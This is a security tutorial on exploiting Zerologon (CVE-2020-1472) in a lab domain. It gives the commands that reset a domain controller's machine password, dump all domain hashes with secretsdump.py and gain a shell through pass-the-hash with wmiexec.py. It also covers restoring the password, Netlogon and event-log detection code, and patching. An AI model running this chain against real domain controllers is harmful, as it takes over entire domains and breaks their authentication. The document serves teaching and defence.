Zerologon?? Easy Way To Take Over Active Directory (Exploitation)

Evan A
MII Cyber Security Consulting Services
8 min read · Feb 28, 2021
Images from wallpapercave

Zerologon is the name given to CVE-2020-1472, discovered by Secura researcher Tom Tervoort. In brief, Zerologon is caused by a flaw in the cryptographic authentication scheme of the Netlogon Remote Protocol (MS-NRPC): the client credential is computed with AES-CFB8 using a fixed all-zero IV, so an all-zero credential is accepted for roughly one session key in 256, which lets an attacker bypass authentication simply by retrying. Once the bypass succeeds, the attacker can call the Netlogon function that sets a computer account password and reset the Domain Controller's machine account password to a known value. With the DC's machine account under their control, the attacker can replicate the domain's credential store and obtain the password hashes of every account in the domain.

If you want to know more about how the Zerologon attack breaks the server, you can read the analysis by @_dirkjan here: https://threadreaderapp.com/thread/1306280553281449985.html

Or you can read the Zerologon Original Research and Whitepaper by Secura (Tom Tervoort): https://www.secura.com/blog/zero-logon
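The cryptographic flaw described above, as an added example that is not part of the original article nor of Secura's or VoidSec's code: in CFB8 mode with a fixed all-zero IV, encrypting an all-zero challenge yields an all-zero ciphertext exactly when the first keystream byte E_k(0)[0] is zero, which happens for about one session key in 256. The block function here is an HMAC-SHA256 stand-in for AES-128 (an assumption made so the script runs with the standard library only; CFB mode only ever uses the forward direction of the cipher, so the argument is unchanged with real AES), the "server" is simulated locally, and the sample session keys are constructed.

```python
import hashlib
import hmac
import os

BLOCK = 16  # AES block size; the CFB8 shift register is one block wide


def prf_block(key: bytes):
    """Keyed 16-byte block function standing in for AES-128 (assumption: HMAC-SHA256
    truncated to one block). CFB8 only calls the forward direction, so the 1/256
    argument below is identical if you swap in a real AES encryptor."""
    def enc(block: bytes) -> bytes:
        return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]
    return enc


def cfb8_encrypt(enc, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8 mode: each plaintext byte is XORed with the first byte of E(register),
    then the resulting ciphertext byte is shifted into the register."""
    reg = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ enc(bytes(reg))[0]
        out.append(c)
        reg = reg[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """MS-NRPC ComputeNetlogonCredential (AES flavour): CFB8 with a FIXED all-zero IV.
    The fixed IV is the bug: the keystream byte for position 0 never varies."""
    return cfb8_encrypt(prf_block(session_key), b"\x00" * BLOCK, challenge)


def server_accepts_zero_credential(session_key: bytes) -> bool:
    """Zerologon client: ClientChallenge = 8 zero bytes, ClientCredential = 8 zero bytes.
    The server recomputes the credential under its session key and compares."""
    expected = compute_netlogon_credential(session_key, b"\x00" * 8)
    return hmac.compare_digest(expected, b"\x00" * 8)


def first_keystream_byte_is_zero(session_key: bytes) -> bool:
    """Why it works: if E_k(0)[0] == 0 the first ciphertext byte is 0, the register
    stays all zeros, and every following byte is 0 as well. Otherwise byte 0 is
    non-zero and the credential is rejected."""
    return prf_block(session_key)(b"\x00" * BLOCK)[0] == 0


def sample_session_keys(n: int) -> list:
    """Constructed, deterministic sample of n session keys (sha256 of a counter)."""
    return [hashlib.sha256(i.to_bytes(4, "big")).digest()[:BLOCK] for i in range(n)]


def count_weak_session_keys(n: int) -> int:
    """About n/256 of the sampled keys accept the all-zero credential."""
    return sum(server_accepts_zero_credential(k) for k in sample_session_keys(n))


def simulate_attack(max_attempts: int = 2000):
    """Each attempt the server chooses a fresh ServerChallenge and therefore a fresh
    session key the attacker cannot predict (modelled as random bytes). The exploit
    scripts simply retry: with p = 1/256 per try, 2000 tries all fail with probability
    (255/256)**2000, well under 0.1%. Returns the attempt number that succeeded."""
    for attempt in range(1, max_attempts + 1):
        if server_accepts_zero_credential(os.urandom(BLOCK)):
            return attempt
    return None


if __name__ == "__main__":
    print("weak keys among 4096 samples:", count_weak_session_keys(4096), "(expect about 16)")
    print("bypass succeeded on attempt", simulate_attack())
```

Replacing the all-zero IV with a fresh random IV per credential, or rejecting a zero ClientChallenge, breaks the chain of reasoning in first_keystream_byte_is_zero: the register no longer starts at zero, so a zero credential no longer corresponds to a single predictable keystream byte.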

Affected Systems

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2016
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)
  • Windows Server, version 2004 (Server Core installation)

Preparation

Before exploiting the Active Directory environment, we need a few prerequisites:

Installing Impacket & the Zerologon exploit script

  1. If an old packaged version of Impacket is installed, uninstall it first: apt remove --purge impacket-scripts python3-impacket
  2. Clone the latest version of Impacket: git clone https://github.com/SecureAuthCorp/impacket and then cd impacket
  3. Install it: pip3 install .
  4. Clone the Zerologon exploit script from the VoidSec repository: git clone https://github.com/VoidSec/CVE-2020-1472
  5. Install the tool's requirements with pip from inside the CVE-2020-1472 directory: pip3 install -r requirements.txt

Exploitation

Before exploiting the target, note the warning from VoidSec's README:

It will likely break things in production environments (eg. DNS functionality, communication with replication Domain Controllers, etc); target clients will then not be able to authenticate to the domain anymore, and they can only be re-synchronized through manual action.

So be careful if you run this script in a production environment.

In this tutorial, I'll exploit the target up to the point of obtaining a shell.

Information gathering of target using Nmap tool

To run the VoidSec exploit script, we first need the DC name, and it must be the Domain Controller's NetBIOS computer name (not its DNS hostname or FQDN). To find it, you can use nbtscan or Nmap (its nbstat NSE script). If the DC name isn't correct, the script will likely fail with a STATUS_INVALID_COMPUTER_NAME error.

Exploit script description (help output)
Using nbtscan to obtain the NetBIOS name

Once we know the DC name, we can run the script as follows:

python3 cve-2020-1472-exploit.py -n <DC-NAME> -t <IP-Target>

Running Exploit Script

As we can see, the exploit script first asks for approval before continuing the exploit and changing the Domain Controller's password. Because the authentication bypass only succeeds for about one in 256 session keys, the script retries the Netlogon handshake (up to 2000 attempts) until it gets through. If you choose N, the script only works as a checker; if you choose Y, it resets the Domain Controller's machine account password to an empty string.

After you have successfully changed the Domain Controller's machine account password to an empty string, you can run Impacket's secretsdump.py (in the impacket/examples directory) to dump the domain credentials from the Domain Controller, authenticating as the DC's machine account with an empty password:

python3 secretsdump.py -no-pass -just-dc <Domain>/<DC-Name>\$@<IP-Target>

Dumping domain credentials from the Domain Controller

Then you can use a hash obtained from the secretsdump.py output to gain a shell with the wmiexec.py module in the impacket/examples directory (pass-the-hash; the -hashes value is given as LMHASH:NTHASH, as printed by secretsdump.py):

python3 wmiexec.py -hashes <LMHASH:NTHASH> <domain>/<User>@<IP-Target>

Successful RCE on the victim

Password Restore

After the DC's machine account password has been changed, the Active Directory server no longer works properly (replication and other Netlogon secure channel traffic breaks). Restoring the original password hash is necessary for the DC to operate normally again.

After you have obtained a Domain Admin credential, run wmiexec.py against the target DC with a hash obtained from secretsdump.py and perform the following steps:

Saving the SAM, SYSTEM and SECURITY registry hives on the DC and downloading them, to recover the original machine account password

Then run this command on the attacker machine to extract the original password hash of the DC's machine account from the downloaded hives (it appears as the $MACHINE.ACC entry of the SECURITY hive):

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Original NT hash of the machine account

After that, you can reinstall the original machine account hash in the domain using reinstall_original_pw.py. Because this script also relies on the 1-in-256 authentication bypass, more than one run is sometimes needed before it succeeds.

python3 reinstall_original_pw.py <DC-Name> <IP> <ORIGINAL-NT-HASH>

Restoring the password to the original value

To confirm that the original password has been restored, run the earlier secretsdump.py command again. Since the machine account password is no longer empty, it should now fail to authenticate, as shown below.

python3 secretsdump.py -no-pass -just-dc <Domain>/<DC-Name>\$@<IP-Target>

Output of the script after the DC's password has been successfully restored

An Analysis of What Happens When an Attacker Exploits This Vulnerability

Since the attack abuses the Netlogon protocol, let's look at the Netlogon log file at C:\Windows\debug\netlogon.log. By default, however, only a subset of Netlogon events is logged. To enable Netlogon debug logging, run this command with administrator privileges on the Domain Controller:

nltest /dbflag:0x2080ffff

The screenshot below shows a few interesting lines logged by the Netlogon service while the attacker exploited this vulnerability.

Example of Netlogon log during exploitation of the Zerologon Vulnerability

When Netlogon debug mode is enabled, every step of this attack is logged by the system. Here is an explanation of the image above:

To confirm that the value in the green box is the NT hash of an empty password (the NT hash is MD4 of the UTF-16LE password, and the log prints it in little-endian byte order), check this out:

Reordering the little-endian bytes into the NT hash
Lookup result: the hash matches the NT hash of an empty string

Apart from the Netlogon log, when the attacker changed the computer account's password to the empty string, several events were generated in the Security event log, including Event ID 4742 (A computer account was changed) with ANONYMOUS LOGON as the subject.

Event 4742 shows that the password of the AD-SERVER$ account was changed (this is the reset to the empty string) at 2/23/2021 04:08:23 PM

When the attacker authenticates and gains a shell using wmiexec.py, the Security event log records Event ID 4624 (An account was successfully logged on) with the information shown below.

Event 4624 generated from Security Event Log

From the Event 4624 screenshot we can see that the attacker's IP is 192.168.1.13, that they authenticated with the Administrator account using NtLmSsp as the logon process (NTLM, consistent with pass-the-hash), and that the logon type is 3 (Network, i.e. a connection from elsewhere on the network such as to a shared folder on this computer), at 2/23/2021 4:21:39 PM.
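The two Security log indicators discussed in this section, turned into detection logic as an added example (not part of the original article): a 4742 computer account password change whose subject is ANONYMOUS LOGON is never legitimate and is the high-fidelity Zerologon signal; a 4624 logon type 3 via NtLmSsp is normal on its own, so it is only reported as a follow-on when it lands shortly after such a reset. The records below are constructed to mirror the scenario in the article, using the real EventData field names of events 4742 and 4624; they are not exported from a real DC, and the one-hour correlation window is an assumption.

```python
from datetime import datetime, timedelta

# Constructed sample records (field names follow the Security log EventData schema for
# 4742 "A computer account was changed" and 4624 "An account was successfully logged on").
SAMPLE_EVENTS = [
    # Zerologon reset of the DC machine account: anonymous subject, computer target
    {"EventID": 4742, "TimeCreated": "2021-02-23T16:08:23",
     "SubjectUserName": "ANONYMOUS LOGON", "SubjectDomainName": "NT AUTHORITY",
     "TargetUserName": "AD-SERVER$", "TargetDomainName": "LAB",
     "PasswordLastSet": "2/23/2021 4:08:23 PM"},
    # Benign: a workstation rotating its own machine account password
    {"EventID": 4742, "TimeCreated": "2021-02-23T16:10:00",
     "SubjectUserName": "WKSTN01$", "SubjectDomainName": "LAB",
     "TargetUserName": "WKSTN01$", "TargetDomainName": "LAB",
     "PasswordLastSet": "2/23/2021 4:10:00 PM"},
    # Attacker's wmiexec.py pass-the-hash session
    {"EventID": 4624, "TimeCreated": "2021-02-23T16:21:39", "LogonType": 3,
     "LogonProcessName": "NtLmSsp", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Administrator", "TargetDomainName": "LAB",
     "IpAddress": "192.168.1.13"},
    # Benign: interactive console logon on the DC
    {"EventID": 4624, "TimeCreated": "2021-02-23T16:25:00", "LogonType": 2,
     "LogonProcessName": "User32", "AuthenticationPackageName": "Negotiate",
     "TargetUserName": "Administrator", "TargetDomainName": "LAB",
     "IpAddress": "127.0.0.1"},
]


def _when(ev: dict) -> datetime:
    return datetime.fromisoformat(ev["TimeCreated"])


def is_anonymous_machine_password_reset(ev: dict) -> bool:
    """4742 where the subject is ANONYMOUS LOGON and the target is a computer account.
    Machine accounts rotate their own passwords (subject == target), never anonymously."""
    return (ev.get("EventID") == 4742
            and ev.get("SubjectUserName", "").upper() == "ANONYMOUS LOGON"
            and ev.get("TargetUserName", "").endswith("$"))


def is_network_ntlm_logon(ev: dict) -> bool:
    """4624 logon type 3 through NtLmSsp: what wmiexec.py/pass-the-hash produces."""
    return (ev.get("EventID") == 4624
            and ev.get("LogonType") == 3
            and ev.get("LogonProcessName") == "NtLmSsp")


def find_zerologon_indicators(events: list, window: timedelta = timedelta(hours=1)) -> list:
    """One finding per anonymous machine-account reset, with any network NTLM logons
    that followed it within `window` attached as follow-on activity."""
    findings = []
    for reset in filter(is_anonymous_machine_password_reset, events):
        t0 = _when(reset)
        follow_on = [
            (ev["TargetUserName"], ev.get("IpAddress"))
            for ev in events
            if is_network_ntlm_logon(ev) and t0 <= _when(ev) <= t0 + window
        ]
        findings.append({
            "account": reset["TargetUserName"],
            "reset_at": reset["TimeCreated"],
            "follow_on_logons": follow_on,
        })
    return findings


if __name__ == "__main__":
    for f in find_zerologon_indicators(SAMPLE_EVENTS):
        print(f"[!] {f['account']} password reset anonymously at {f['reset_at']}")
        for user, ip in f["follow_on_logons"]:
            print(f"    follow-on network NTLM logon: {user} from {ip}")
```

In a real pipeline the records would come from the DC's Security log (for example via Get-WinEvent or a SIEM export) rather than the inline list; the logic stays the same.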

Mitigation

On February 9, 2021, Microsoft released the second phase of its security updates for CVE-2020-1472 (Zerologon). This update enables enforcement mode by default on all supported Windows Domain Controllers: vulnerable Netlogon secure channel connections from non-compliant devices are blocked unless the device has been explicitly added to the security group referenced by the "Domain Controller: Allow vulnerable Netlogon secure channel connections" Group Policy. Microsoft strongly recommends that all customers install the February 2021 updates to be fully protected from the Zerologon vulnerability.

After I installed the latest security update from Microsoft, I ran the VoidSec exploit script again to check whether the Zerologon vulnerability still existed, and the script's output shows that the victim has been patched.

The victim has been patched
